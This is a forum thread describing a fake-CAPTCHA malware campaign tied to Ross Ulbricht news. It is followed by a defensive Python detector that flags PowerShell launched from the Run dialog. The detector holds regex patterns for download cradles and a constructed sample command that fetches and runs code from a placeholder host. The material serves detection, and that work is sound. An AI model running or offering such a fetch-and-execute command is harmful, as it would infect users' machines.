this post was submitted on 23 Jan 2025
16 points (100.0% liked)

Threat actors on X are exploiting the news around Ross Ulbricht to direct unsuspecting users to a Telegram channel that tricks them into running PowerShell code that infects them with malware.

[–] [email protected] 6 points 5 months ago

We've been seeing these types of attacks for a couple of months, mostly not from telegram links. The way they work is pretty ingenious, in that it leverages the fact that everyone has gotten used to the various "do this thing to prove you're human". In this case the attack works like:

  • User is directed to a link controlled by the attacker. The link will claim to be something the user wants.
    • In my experience, this has been movie or software downloads.
  • This site presents a page which basically says "prove you are human to get the thing".
  • In the background, the attack site uses javascript to pre-load the user's clipboard with a malicious PowerShell command.
  • The site's instructions to "prove you are human" look like:
    1. Press the key combination Win+R
    2. Press the key combination Ctrl+V
    3. Press Enter
  • The user, having been trained to "prove they are human", follows these instructions, resulting in a PowerShell command being run which downloads the malicious payload and executes it.

The payloads we've seen have been info stealers (RedLine, Lumma Stealer, etc.). They also drop some type of Remote Access Tool (e.g. AnyDesk) which the attacker could come back to later, move laterally and try to deploy ransomware.
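As an added detection example (not part of this post or thread), the heuristic below scores process-creation records for the Win+R / Ctrl+V pattern described above: a shell whose parent is explorer.exe (the Run dialog) combined with download-and-execute indicators in the command line. Field names follow Sysmon Event ID 1 conventions, and the sample records and the domain in them are constructed.

```python
import re
from typing import Dict, List

# Indicators of a download-and-execute cradle. Constructed, non-exhaustive list.
CRADLE_PATTERNS = [
    r"\biex\b", r"invoke-expression", r"invoke-webrequest", r"\biwr\b",
    r"downloadstring", r"-e(nc|ncodedcommand)?\s+[a-z0-9+/=]{20,}",
    r"https?://", r"-w(indowstyle)?\s+hidden",
]
CRADLE_RE = re.compile("|".join(CRADLE_PATTERNS), re.IGNORECASE)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

def evaluate(event: Dict[str, str]) -> Dict[str, object]:
    """Verdict for one process-creation record.

    Fields assumed (Sysmon Event ID 1 naming): Image, ParentImage, CommandLine.
    """
    image = event["Image"].rsplit("\\", 1)[-1].lower()
    parent = event["ParentImage"].rsplit("\\", 1)[-1].lower()
    cmd = event.get("CommandLine", "")
    reasons: List[str] = []
    if image in SHELLS and parent == "explorer.exe":
        # The Run dialog spawns its child directly under explorer.exe, which is
        # unusual for scripted or admin-driven PowerShell (those come via cmd,
        # a scheduler, or a management agent).
        reasons.append("shell launched from explorer.exe (Run dialog)")
    hits = sorted({m.group(0).lower() for m in CRADLE_RE.finditer(cmd)})
    if hits:
        reasons.append("download/execute indicators: " + ", ".join(hits))
    # Alert only when both the odd parent and cradle content are present;
    # either one alone is too noisy on a real fleet.
    return {"suspicious": len(reasons) == 2, "reasons": reasons}

def scan(events: List[Dict[str, str]]) -> List[Dict[str, object]]:
    return [evaluate(e) for e in events]

# Constructed sample records, not real telemetry; the domain is a placeholder.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://captcha.example.invalid/v)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -File C:\\scripts\\backup.ps1"},
]

if __name__ == "__main__":
    for e, v in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        print(v["suspicious"], v["reasons"], "<-", e["CommandLine"])
```

Pairing this with a simple Run-dialog history check (the `RunMRU` registry key records what users typed into Win+R) gives a useful triage artifact when the process log alone is ambiguous.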